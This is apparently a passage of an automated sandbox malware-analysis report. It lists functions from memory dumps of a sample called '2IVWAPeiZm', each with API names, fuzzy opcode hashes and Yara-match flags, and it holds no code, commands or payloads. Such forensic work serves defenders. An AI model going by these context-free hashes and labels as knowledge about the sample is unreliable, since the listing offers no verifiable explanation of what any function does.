                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                          • String ID:
                          • API String ID: 1445889803-0
                          • Opcode ID: 93f1a9ba9138021f6c49841d23b575579b0bcc3cc95a229cf794d83a4df072c6
                          • Instruction ID: 852921afdc1fa40df51cd22b0500a1ee37b43bc2cd1f97d20b2520618b15bbe2
                          • Opcode Fuzzy Hash: 93f1a9ba9138021f6c49841d23b575579b0bcc3cc95a229cf794d83a4df072c6
                          • Instruction Fuzzy Hash: 4401D631295AC582FB808F25F8447957373F759B90F446639EE5A477A4DB3CCE868300
                          Function 000001CFB960B790 Relevance: 7.5, APIs: 5, Instructions: 33COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$Enter$DeleteGdiplusLeaveObjectShutdown
                          • String ID:
                          • API String ID: 1513102227-0
                          • Opcode ID: d0bf30436cb6d58d92d898ab182b5300c8b452775190517e675a416d92231e2b
                          • Instruction ID: 57cce3cbb79957f1df4e9ce384316e2983ed43be1ab8d2ab11d011b2e852e6a2
                          • Opcode Fuzzy Hash: d0bf30436cb6d58d92d898ab182b5300c8b452775190517e675a416d92231e2b
                          • Instruction Fuzzy Hash: 4611C931585A8785FB14AF28E890B943377F728B25F54823DC55E422B0DF39CA97C710
                          Function 000001CFB961DBD0 Relevance: 7.5, APIs: 5, Instructions: 31COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: __doserrno_errno
                          • String ID:
                          • API String ID: 921712934-0
                          • Opcode ID: 8ad11543daa31dafea5a7ef4bb8147fe8d70931eb13c3c1b692cc721a04b9c45
                          • Instruction ID: 59acc741b239374f41bbac257c6b186cc62a1addbc5e7f6c7b0eeff3fb75abf3
                          • Opcode Fuzzy Hash: 8ad11543daa31dafea5a7ef4bb8147fe8d70931eb13c3c1b692cc721a04b9c45
                          • Instruction Fuzzy Hash: 2101A9716846E644FE095B24C8917EC22739B91B76F51772CD629073D1C778CE438720
                          Function 000001CFB93A2B0C Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 135COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno_fltout2_invalid_parameter_noinfo
                          • String ID: -
                          • API String ID: 485257318-2547889144
                          • Opcode ID: 230054471ab9e94bf14a18ec9c1b65bcb69ff4194e86f8a2025a727ab66c8c29
                          • Instruction ID: 6d975a5da2501452d81ed0bf484249aaaecd0f2317462d8525fc659979cd0ee9
                          • Opcode Fuzzy Hash: 230054471ab9e94bf14a18ec9c1b65bcb69ff4194e86f8a2025a727ab66c8c29
                          • Instruction Fuzzy Hash: 8441D730258A884FF754EB28D481BAE73FAEF99354F2C053EA48AC3191DB21CD468753
                          Function 000001CFB9604670 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115networkCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: EnumErrorEventEventsLastNetworkReset
                          • String ID:
                          • API String ID: 1050048411-3916222277
                          • Opcode ID: 7d9898d8a928488bb2d2e3ad9feb40c7b820fd09d0a22babb1b49dbd3cdc5722
                          • Instruction ID: d81159e8d142ec6f546478dc847c4dcc6171a1fd6fa201d21721a131658ca1dd
                          • Opcode Fuzzy Hash: 7d9898d8a928488bb2d2e3ad9feb40c7b820fd09d0a22babb1b49dbd3cdc5722
                          • Instruction Fuzzy Hash: 64518B761446C286F3708F2AD4C4B9977F3F785B88F150229DA8847689FB79CE468B00
                          Function 000001CFB93A35C9 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd
                          • String ID: csm
                          • API String ID: 3186804695-1018135373
                          • Opcode ID: 916a707afdb0f71ebe95bef2f33ca7e6fa47fc2edc3f926a604d61cd2de3a953
                          • Instruction ID: 27823d4b1363f1907507b80d5f15e0d1330c455112ef794140b19b80994e2faf
                          • Opcode Fuzzy Hash: 916a707afdb0f71ebe95bef2f33ca7e6fa47fc2edc3f926a604d61cd2de3a953
                          • Instruction Fuzzy Hash: CD3141701487448FEB68EF58C485BA9B3F6FF58311F68056DD48A87292DB31ED42CB82
                          Function 000001CFB93A23C4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 92COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno_fltout2_invalid_parameter_noinfo
                          • String ID: -
                          • API String ID: 485257318-2547889144
                          • Opcode ID: bbdcb5bc06b9c46dfb1d423dceb7eebd86a9672f6a5897a7d82af974e746431d
                          • Instruction ID: 57246efe833cc0efb548625a94b90613c86f34033cb4489cb833ace9819bdc7e
                          • Opcode Fuzzy Hash: bbdcb5bc06b9c46dfb1d423dceb7eebd86a9672f6a5897a7d82af974e746431d
                          • Instruction Fuzzy Hash: FA21B831258E884BE754EB68D885BEB73EAFF94310F2C053EA45AC3191DF25CD468742
                          Function 000001CFB96202D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_fltout2_invalid_parameter_noinfo
                          • String ID: -
                          • API String ID: 485257318-2547889144
                          • Opcode ID: 35320a481620dab2e50c4e0e722baade6b2a87799585edebcd6d3ffa4115d845
                          • Instruction ID: df76d332873e9922737d48df5578d0a659888d0a779f3e5f326a7512a5983815
                          • Opcode Fuzzy Hash: 35320a481620dab2e50c4e0e722baade6b2a87799585edebcd6d3ffa4115d845
                          • Instruction Fuzzy Hash: FB312D327446C286FA10AF25E440BDDB773A7467D4F14423AEE8817BD5DB28CD46C700
                          Function 000001CFB9620768 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 66COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfo
                          • String ID: 1
                          • API String ID: 2819658684-2212294583
                          • Opcode ID: c642461044470a636fc6584bdf35ba86ddc5126ec19c8575d3bd6bfd62c5adfc
                          • Instruction ID: 61600fee5e3dd8d4d1264fab7364ae2bbffb5948896447f79e807743b6c6f17b
                          • Opcode Fuzzy Hash: c642461044470a636fc6584bdf35ba86ddc5126ec19c8575d3bd6bfd62c5adfc
                          • Instruction Fuzzy Hash: 3B21F232A5A2D289FB16AF28C450BEC7AB79742780F99C039970106283D72DCF43CB11
                          Function 000001CFB9611EF8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _callnewh_errno$AllocHeapmallocstd::exception::exception
                          • String ID: bad allocation
                          • API String ID: 2837191506-2104205924
                          • Opcode ID: f818d2775c6305b500d078a1a8a4caeafb0dc2e89b273f6cd29466fe778cb0c2
                          • Instruction ID: 7d45945c8d2f0b3a60395d5507fc41d2b15cb0ee758708613101aa11e7b17955
                          • Opcode Fuzzy Hash: f818d2775c6305b500d078a1a8a4caeafb0dc2e89b273f6cd29466fe778cb0c2
                          • Instruction Fuzzy Hash: 5C0117716947DB95FB14AB24E891FD423B3B754340F85603EA98A466A2EF3CCB46C700
                          Function 000001CFB9614320 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 17libraryloaderCOMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressHandleModuleProc
                          • String ID: CorExitProcess$mscoree.dll
                          • API String ID: 1646373207-1276376045
                          • Opcode ID: 5736814c69beffde4e4d80d6363d91561644225385019cb1483e72a6c3f14607
                          • Instruction ID: cc8b348221a8df08854f6038582eaee80f553155ff2501c3aedf9320ef07c662
                          • Opcode Fuzzy Hash: 5736814c69beffde4e4d80d6363d91561644225385019cb1483e72a6c3f14607
                          • Instruction Fuzzy Hash: C4E012707917C241FE596B65E885BA823B35B68700F4C643F842E0A795DF68DF8BC300
                          Function 000001CFB9610680 Relevance: 6.3, APIs: 5, Instructions: 75memoryCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: free$Heap$FreeProcess
                          • String ID:
                          • API String ID: 3493288988-0
                          • Opcode ID: a9c4bccd5f9a346d1e3777055ef938d6c7925542efb5f64d06566f38dad4b808
                          • Instruction ID: 02fd873d4db9008b71757dd94e6faab37bb303bfa823f4d0ff5b690aa1cbb38d
                          • Opcode Fuzzy Hash: a9c4bccd5f9a346d1e3777055ef938d6c7925542efb5f64d06566f38dad4b808
                          • Instruction Fuzzy Hash: 4F317E36741AA193FB54DB66E140B9D6372FB89FC0F089129DF4A43B44CF34D9A28740
                          Function 000001CFB939CD33 Relevance: 6.2, APIs: 4, Instructions: 223COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfoiswctype
                          • String ID:
                          • API String ID: 248606491-0
                          • Opcode ID: 025969511743ca9b7b77820490b951f5d92e9bdbd70d4695079a5e4bd762ea18
                          • Instruction ID: a409104f7905c560a268e4eda0a993dda6a10481c5a2ef06805719fea66bb207
                          • Opcode Fuzzy Hash: 025969511743ca9b7b77820490b951f5d92e9bdbd70d4695079a5e4bd762ea18
                          • Instruction Fuzzy Hash: 8E61C732C8469949F7742619D846BF637EEEF52751F3C023DD99B861C2E760CE434285
                          Function 000001CFB95C32D9 Relevance: 6.2, APIs: 4, Instructions: 220COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfoiswctype
                          • String ID:
                          • API String ID: 248606491-0
                          • Opcode ID: 51c6b283717e53557eb812972e9f858eb7df38c66164fb907231a6e952fa1e14
                          • Instruction ID: 4735c5bdb76219ed68de2f29735bc8d56dd2dba42c5814e6d7e2bb49f5c44a63
                          • Opcode Fuzzy Hash: 51c6b283717e53557eb812972e9f858eb7df38c66164fb907231a6e952fa1e14
                          • Instruction Fuzzy Hash: E751E6334CC69E47FB791519DA8ABFA31F6E751B60F20123DD892868D1EB74CE438182
                          Function 000001CFB9613808 Relevance: 6.2, APIs: 4, Instructions: 166COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_invalid_parameter_noinfoiswctype
                          • String ID:
                          • API String ID: 248606491-0
                          • Opcode ID: 6779dbc9006290503d7b8c82871114c35dbc3fce9c9751f5dd413b593bd34c68
                          • Instruction ID: d4f159cc8704b98c47e279f467eab7df214267434bb0f49aef2a50a5d3f37be0
                          • Opcode Fuzzy Hash: 6779dbc9006290503d7b8c82871114c35dbc3fce9c9751f5dd413b593bd34c68
                          • Instruction Fuzzy Hash: 7C51E532A845F346FBB45B2AD802FEA21F3AB40764F55653ADE53461C1F778CE879202
                          Function 000001CFB9614C18 Relevance: 6.2, APIs: 4, Instructions: 159COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: DecodePointer_errno_invalid_parameter_noinfo_lock
                          • String ID:
                          • API String ID: 27599310-0
                          • Opcode ID: 8a5b73d5d9ca1ff1b538d391cd8af4bb4012ae1134a033dcb573f3cbad0ba9a6
                          • Instruction ID: 5a5cca8e32c16fe1e25a9dab215cef969610649eba1caea192d2224ed2ec24f4
                          • Opcode Fuzzy Hash: 8a5b73d5d9ca1ff1b538d391cd8af4bb4012ae1134a033dcb573f3cbad0ba9a6
                          • Instruction Fuzzy Hash: 9451F6316847E282FA69DB28E440FEA76B3F784744F64653DDA4A43694DB38DF43C200
                          Function 000001CFB93A31FC Relevance: 6.2, APIs: 4, Instructions: 154COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _getptd$BaseImage
                          • String ID:
                          • API String ID: 2482573191-0
                          • Opcode ID: 9c5b89509d60e0603f5a734c5cd4ba2a093cff095a5bf51701f84cb58c52bfef
                          • Instruction ID: 197594afeeda7828dbc0960f67c6e4609826bb358be0869b589a9b4486aece64
                          • Opcode Fuzzy Hash: 9c5b89509d60e0603f5a734c5cd4ba2a093cff095a5bf51701f84cb58c52bfef
                          • Instruction Fuzzy Hash: 15418E31598A458AF3146768C446BED72FAEF45324F3C86BEE456C31E3DB64DE438282
                          Function 000001CFB95C491D Relevance: 6.2, APIs: 4, Instructions: 150COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno$_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 3655708593-0
                          • Opcode ID: 87cd96422aea3bb6b0bce4e86e7506652a3eb2d6d527ccc641051d1cd25ab59a
                          • Instruction ID: d8f4f38671a4c0591dd0e1c1c35e3bf85c253b9bdf94d7b704b735f10896362c
                          • Opcode Fuzzy Hash: 87cd96422aea3bb6b0bce4e86e7506652a3eb2d6d527ccc641051d1cd25ab59a
                          • Instruction Fuzzy Hash: F851B132194A984FFB989F28C581FE936F2EB58320F14026DD855CB6D6D774DE82C780
                          Function 000001CFB939AA68 Relevance: 6.2, APIs: 4, Instructions: 150COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: _errno$_getbuf_invalid_parameter_noinfo_isatty
                          • String ID:
                          • API String ID: 3655708593-0
                          • Opcode ID: b472cfe05d8d2ec8d2c21cd6346baf259e13895f094dcae3d3b00828071a2771
                          • Instruction ID: 76a027b6367f128b2f46bd50450372640a87b98aaa5307489fb3bcbfd263c106
                          • Opcode Fuzzy Hash: b472cfe05d8d2ec8d2c21cd6346baf259e13895f094dcae3d3b00828071a2771
                          • Instruction Fuzzy Hash: 7A516030154A884FFBA89F28C495BA977E6EF58310F2D07ADD857CB2D6D724CE428781
                          Function 000001CFB9620060 Relevance: 6.1, APIs: 4, Instructions: 115COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_invalid_parameter_noinfo$_getptd
                          • String ID:
                          • API String ID: 1297830140-0
                          • Opcode ID: 4b61b820ce18982db4ac574c72c3f4b0ba5c6ee02f44edb5eb580702fda48f22
                          • Instruction ID: 382cc4761e674a6889f983febabb1e119e7002ed9fbbe27a179118b6407aeb02
                          • Opcode Fuzzy Hash: 4b61b820ce18982db4ac574c72c3f4b0ba5c6ee02f44edb5eb580702fda48f22
                          • Instruction Fuzzy Hash: 8F41E0326447D586FB60AF65D588BE977B3E782BD0F05813ADB4943796CB28CA47C700
                          Function 000001CFB962358C Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _getptd$BaseImage_amsg_exit
                          • String ID:
                          • API String ID: 2306399499-0
                          • Opcode ID: 7508f3b3fd4028dca9c83341e5ac7cef807879085b4d62799d2ee17d16bee354
                          • Instruction ID: a46a31a3c97406802d780b6c1ab352eef81b8d6219b277a4461bbf7978abf761
                          • Opcode Fuzzy Hash: 7508f3b3fd4028dca9c83341e5ac7cef807879085b4d62799d2ee17d16bee354
                          • Instruction Fuzzy Hash: 5D419F3264068382FA28BB15D585FEDB6B7A784F9AF158539DE19437E2CB34CE478700
                          Function 000001CFB93998FC Relevance: 6.1, APIs: 4, Instructions: 99COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112135711.000001CFB9391000.00000020.10000000.00040000.00000000.sdmp, Offset: 000001CFB9391000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9391000_2IVWAPeiZm.jbxd
                          Similarity
                          • API ID: Initialize_cinit
                          • String ID:
                          • API String ID: 3622512177-0
                          • Opcode ID: 999c38da4a7799e0715cc289d82767e970d3cc9920d0328cda324a3349d3ccc4
                          • Instruction ID: 35c973bcf40e1b5bc0798e8f8867006e821be344f8c032884e3525acf8bc2ff3
                          • Opcode Fuzzy Hash: 999c38da4a7799e0715cc289d82767e970d3cc9920d0328cda324a3349d3ccc4
                          • Instruction Fuzzy Hash: 8F3112306846814AFB50B778D962BE933BBAF41304F2D063DA547C62D3EF25CE428752
                          Function 000001CFB95C1DA1 Relevance: 6.1, APIs: 4, Instructions: 98COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112601282.000001CFB95B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB95B0000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb95b0000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _errno_getptd_invalid_parameter_noinfofree
                          • String ID:
                          • API String ID: 4053972703-0
                          • Opcode ID: 43f98ba4b15c26d521d80577bb0f8a8933ead76389b9e6d44e0add2e746f4bc6
                          • Instruction ID: d8bed324218c6db1c5078a01dc22eefd3476ab3aa7e2e11ba636c7d015b6ed27
                          • Opcode Fuzzy Hash: 43f98ba4b15c26d521d80577bb0f8a8933ead76389b9e6d44e0add2e746f4bc6
                          • Instruction Fuzzy Hash: 7F21B931688B494FF744BB69D846BA977F2EB98311F00463EE449C36A2DB60DD428782
                          Function 000001CFB9604820 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: ErrorEventLastSelect
                          • String ID:
                          • API String ID: 1135597009-0
                          • Opcode ID: 9729f9626bfa02fdb25227b366fcace41139834b60a4ecbd8e493ab59bbb4f50
                          • Instruction ID: 3c586218033fad26efa76cea1dedd17017c5a61168a63172f8a7656d78cb87be
                          • Opcode Fuzzy Hash: 9729f9626bfa02fdb25227b366fcace41139834b60a4ecbd8e493ab59bbb4f50
                          • Instruction Fuzzy Hash: DA21CFB260018187F750DF7AD488B9C37B3F754B98F540139CA18876D4EB7AC986CB10
                          Function 000001CFB9605080 Relevance: 6.1, APIs: 4, Instructions: 56COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$Leave$EnterEvent
                          • String ID:
                          • API String ID: 3394196147-0
                          • Opcode ID: a2ac5f14c1fdbe427516915e7673df18383f0521a432ce3d7036e12227a3bb22
                          • Instruction ID: 83a4c5854701827010ca6dd7a58362c9b8c923de3aa7ac550c7e6093f0022ba1
                          • Opcode Fuzzy Hash: a2ac5f14c1fdbe427516915e7673df18383f0521a432ce3d7036e12227a3bb22
                          • Instruction Fuzzy Hash: 6A212632254BC193E648CF26E58079DB3B6F758B90F548029DBAA43724DF38E9A2C740
                          Function 000001CFB96173C0 Relevance: 6.0, APIs: 4, Instructions: 45COMMONLIBRARYCODE
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000000.00000002.4112680827.000001CFB9600000.00000040.00001000.00020000.00000000.sdmp, Offset: 000001CFB9600000, based on PE: true
                          • Associated: 00000000.00000002.4112680827.000001CFB963A000.00000040.00001000.00020000.00000000.sdmpDownload File
                          • Associated: 00000000.00000002.4112680827.000001CFB963C000.00000040.00001000.00020000.00000000.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_1cfb9600000_2IVWAPeiZm.jbxd
                          Yara matches
                          Similarity
                          • API ID: _amsg_exit$_getptd_lockfree
                          • String ID:
                          • API String ID: 2148533958-0
                          • Opcode ID: f2587bb608eee58bbdc4fe3f4ae55a0b20caa350a6235c7f92d91497b64470b6
                          • Instruction ID: 7a147897e926bf7072bf79d4104ef0a9e7542494104610769ccef5e1ca3a4d33
                          • Opcode Fuzzy Hash: f2587bb608eee58bbdc4fe3f4ae55a0b20caa350a6235c7f92d91497b64470b6
                          • Instruction Fuzzy Hash: A1115B32649BD286FA989B15E540BE937B3F784B80F48603DEB4D033A5CF28CE568745
